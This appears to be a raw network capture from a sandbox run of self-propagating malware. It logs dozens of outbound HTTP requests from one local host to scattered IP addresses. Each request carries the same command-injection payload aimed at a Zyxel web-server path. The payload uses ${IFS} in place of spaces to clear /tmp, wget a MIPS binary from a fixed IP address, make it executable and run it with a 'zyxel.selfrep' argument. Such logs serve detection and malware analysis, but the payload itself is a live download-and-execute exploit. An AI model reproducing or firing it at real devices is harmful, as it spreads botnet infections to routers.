                                            Jan 14, 2024 15:50:58.822263002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9442192.168.2.2360106197.113.55.183443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.822310925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9443192.168.2.2345598157.165.223.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.822344065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9444192.168.2.233966649.253.16.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.822416067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9445192.168.2.23387945.39.249.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.822451115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9446192.168.2.2359104124.81.94.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.822509050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9447192.168.2.2352520186.119.237.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.822551966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9448192.168.2.2351346138.38.58.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.822606087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9449192.168.2.2333208148.114.233.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.822644949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9450192.168.2.235419469.240.121.175443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.822722912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9451192.168.2.2353708204.49.16.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.822750092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9452192.168.2.233695217.9.231.207443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.822819948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9453192.168.2.2353578154.228.235.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.822871923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9454192.168.2.2337224189.40.182.0443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.822916031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9455192.168.2.236097014.129.18.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.822937965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9456192.168.2.2338016210.205.132.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.822999001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9457192.168.2.2354380200.151.157.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.823040962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9458192.168.2.2338108201.211.84.107443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.823070049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9459192.168.2.2341202176.181.201.218443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.823112011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9460192.168.2.233524883.219.211.45443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.823163033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9461192.168.2.2350694206.44.100.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.823215961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9462192.168.2.234198012.177.127.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.823240042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9463192.168.2.2356734167.208.187.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.823282957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9464192.168.2.234229246.239.140.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.823345900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9465192.168.2.235528846.137.224.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.823401928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9466192.168.2.2343314212.136.117.92443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.823446035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9467192.168.2.235223265.20.2.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.823482037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9468192.168.2.2347478134.11.46.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.823519945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9469192.168.2.2343078148.180.91.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.823576927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9470192.168.2.2348108176.168.11.250443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.823611021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9471192.168.2.23439262.69.182.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.823645115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9472192.168.2.2346090219.84.85.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.823688030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9473192.168.2.2334546135.121.70.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.823734999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9474192.168.2.2342860206.50.161.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.823776007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9475192.168.2.2350216146.105.252.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.823846102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9476192.168.2.2352204126.128.213.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.823858976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9477192.168.2.234514624.30.115.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.823924065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9478192.168.2.235767837.33.22.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.823939085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9479192.168.2.2348588113.110.93.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.823995113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9480192.168.2.235100284.232.80.84443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.824049950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9481192.168.2.234168078.199.182.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.824070930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9482192.168.2.235030660.131.26.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.824091911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9483192.168.2.235388468.220.54.23443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.824137926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9484192.168.2.234190875.2.167.36443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.824197054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9485192.168.2.2350918164.13.246.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.824223042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9486192.168.2.233531843.38.125.245443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.824274063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9487192.168.2.234608090.254.7.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.824337959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9488192.168.2.2337704201.63.96.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.824379921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9489192.168.2.235080497.61.177.186443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.824426889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9490192.168.2.2347734110.143.80.26443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.824445963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9491192.168.2.234776299.20.123.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.824527979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9492192.168.2.2340360148.146.69.251443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.824569941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9493192.168.2.2334362158.120.14.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.824592113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9494192.168.2.2357886141.211.27.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.824640989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9495192.168.2.233449266.53.238.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.824675083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9496192.168.2.235131052.187.33.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.824729919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9497192.168.2.235707262.131.247.127443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.824774981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9498192.168.2.234088020.159.0.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.824810982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9499192.168.2.2333898159.96.172.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.824855089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9500192.168.2.2353970112.78.237.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.824917078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9501192.168.2.2343102207.160.57.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.824975967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9502192.168.2.2337334118.149.56.166443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.825005054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9503192.168.2.2343906141.94.245.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.825074911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9504192.168.2.2344348216.122.183.205443
                                            TimestampBytes transferredDirectionData
